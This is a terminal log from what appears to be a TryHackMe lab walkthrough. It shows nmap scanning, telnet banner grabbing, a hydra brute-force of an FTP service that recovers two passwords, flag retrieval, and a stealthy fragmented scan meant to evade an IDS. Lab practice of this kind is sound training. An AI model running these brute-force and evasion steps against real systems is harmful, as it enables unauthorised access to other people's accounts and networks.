┌──(kali㉿kali)-[~]
└─$ ip=<ip address>
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-12 22:32 EST
Nmap scan report for <ip address>
Host is up (0.16s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -p 10000- <ip address>
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-12 22:35 EST
Stats: 0:03:57 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 46.67% done; ETC: 22:44 (0:04:31 remaining)
Stats: 0:06:56 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 81.53% done; ETC: 22:44 (0:01:34 remaining)
Nmap scan report for <ip address>
Host is up (0.15s latency).
Not shown: 55535 closed ports
PORT STATE SERVICE
10021/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 502.39 seconds
┌──(kali㉿kali)-[~]
└─$ telnet $ip 80
Trying <ip address>...
Connected to <ip address>.
Escape character is '^]'.
GET
HTTP/1.0 400 Bad Request
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sat, 13 Nov 2021 03:43:44 GMT
Server: lighttpd THM{web_server_25352}
┌──(kali㉿kali)-[~]
└─$ telnet $ip 22
Trying <ip address>...
Connected to <ip address>.
Escape character is '^]'.
SSH-2.0-OpenSSH_8.2p1 THM{946219583339}
┌──(kali㉿kali)-[~]
└─$ hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ftp://$ip:10021
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-12 23:23:05
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2/p:14344399), ~1793050 tries per task
[DATA] attacking ftp://<ip address>:10021/
[10021][ftp] host: <ip address> login: eddie password: jordan
[10021][ftp] host: <ip address> login: quinn password: andrea
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-12 23:23:30
┌──(kali㉿kali)-[~]
└─$ telnet <ip address> 10021
Trying <ip address>...
Connected to <ip address>.
Escape character is '^]'.
220 (vsFTPd 3.0.3)
USER eddie
331 Please specify the password.
PASS jordan
230 Login successful.
LIST /
425 Use PORT or PASV first.
PASV
227 Entering Passive Mode (10,10,94,99,119,129).
┌──(kali㉿kali)-[~]
└─$ telnet <ip address> 10021
Trying <ip address>...
Connected to <ip address>.
Escape character is '^]'.
220 (vsFTPd 3.0.3)
USER quinn
331 Please specify the password.
PASS andrea
230 Login successful.
PASV
227 Entering Passive Mode (10,10,94,99,119,172).
┌──(kali㉿kali)-[~]
└─$ telnet <ip address> 30636
Trying <ip address>...
Connected to <ip address>.
Escape character is '^]'.
LIST /
150 Here comes the directory listing.
226 Directory send OK.
-rw-rw-r-- 1 1002 1002 18 Sep 20 08:27 ftp_flag.txt
Connection closed by foreign host.
┌──(kali㉿kali)-[~]
└─$ telnet <ip address> 10021
Trying <ip address>...
Connected to <ip address>.
Escape character is '^]'.
220 (vsFTPd 3.0.3)
USER quinn
331 Please specify the password.
PASS andrea
230 Login successful.
PASV
227 Entering Passive Mode (10,10,94,99,120,140).
RETR ftp_flag.txt
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
226 Transfer complete.
quit
221 Goodbye.
Connection closed by foreign host.
┌──(kali㉿kali)-[~]
└─$ telnet <ip address> 30860
Trying <ip address>...
Connected to <ip address>.
Escape character is '^]'.
THM{321452667098}
Connection closed by foreign host.
You'll be met with this image. The goal here is to scan the IP without the IDS catching you. So the scan needs to be stealthy.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -f -sN $ip